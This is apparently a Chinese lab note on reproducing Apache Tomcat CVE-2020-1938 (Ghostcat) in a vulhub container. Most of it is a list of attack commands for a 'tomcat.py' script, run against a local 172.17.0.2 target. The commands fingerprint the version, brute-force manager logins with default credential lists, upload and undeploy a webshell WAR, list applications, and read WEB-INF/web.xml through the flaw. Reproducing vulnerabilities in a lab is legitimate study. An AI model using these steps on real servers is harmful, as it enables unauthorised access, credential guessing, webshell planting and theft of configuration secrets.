vulhub tomcat CVE-2020-1938 漏洞复现

Apache Tomcat/9.0.30
可利用此漏洞读取敏感信息
可用的脚本

1
2
3
4
5
6
7
8
9
10
11
12
#version fingerprint
python tomcat.py version 172.17.0.2
#authentication bruteforce
python tomcat.py -v bf -U tomcat_mgr_default_users.txt -P tomcat_mgr_default_pass.txt /manager/html 172.17.0.2
#WAR upload
python tomcat.py upload -u tomcat -p tomcat webshell.war 172.17.0.2
#WAR undeploy
python tomcat.py undeploy -u tomcat -p tomcat /webshell 172.17.0.2
#Application listing
python tomcat.py list -u tomcat -p tomcat 172.17.0.2
#Reading file using CVE-2020-1938
tomcat.py read_file --webapp=manager /WEB-INF/web.xml 172.17.0.2